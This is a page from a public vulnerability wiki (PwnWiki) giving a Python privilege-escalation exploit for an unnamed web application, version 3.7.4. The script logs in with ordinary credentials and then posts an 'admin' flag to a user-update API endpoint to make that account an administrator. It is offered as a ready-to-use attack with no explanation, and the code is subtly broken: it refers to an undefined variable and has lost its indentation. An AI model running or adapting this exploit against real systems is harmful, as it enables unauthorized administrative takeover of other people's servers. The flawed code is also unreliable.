免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
影响版本
Version : 3.7.4
EXP
import sys
import requests
url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'
sess = requests.Session()
sess.get(host)
def login():
print('Attempting to login...')
data = {
'z_username':username,
'z_password':password
}
headers = {
'Content-Type':'application/x-www-form-urlencoded'
}
resp = sess.post(url + '/z_security_check', data=data, headers=headers)
if resp.ok:
print('Logged in successfully.')
else:
print('Could not login.')
sys.exit(1)
def privesc():
data = {
'uname':username,
'fullname':username,
'password':password,
'admin':1
}
resp = sess.post(url + '/api/1/admin/users/update', data=data)
if resp.ok:
print('Escalated to administrator.')
else:
print('Unable to escalate to administrator.')
return
if __name__ == '__main__':
login()
privesc()
免费、自由、人人可编辑的漏洞库
